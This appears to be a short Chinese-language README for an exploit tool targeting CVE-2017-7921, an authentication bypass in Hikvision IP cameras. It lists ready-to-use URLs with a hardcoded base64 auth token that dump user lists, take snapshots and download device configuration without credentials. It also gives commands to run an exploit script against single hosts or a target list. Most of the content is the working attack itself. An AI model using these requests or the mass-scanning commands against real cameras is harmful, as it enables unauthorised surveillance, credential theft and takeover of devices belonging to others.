在海康威视设备中发现了一个身份验证不当的问题。
当应用程序未能充分或正确地对用户进行身份验证时,就会发生这种身份验证不当漏洞。
这可能允许恶意用户在系统上提升其权限,并访问敏感信息。
# inj3ction
https://seclists.org/fulldisclosure/2017/Sep/23
漏洞详情:
\----------------------
获取所有用户及其角色的列表:
http://camera.ip/Security/users?auth=YWRtaW46MTEK
无需身份验证即可获取摄像头快照:
http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
更糟的是,任何人都可以下载摄像头配置:
http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
python3 -m pip install -r requirements.txt
python3 CVE_2017_7921_EXP.py -t xxx.xx.xx.xx run
python3 CVE_2017_7921_EXP.py -t ./targets.txt run
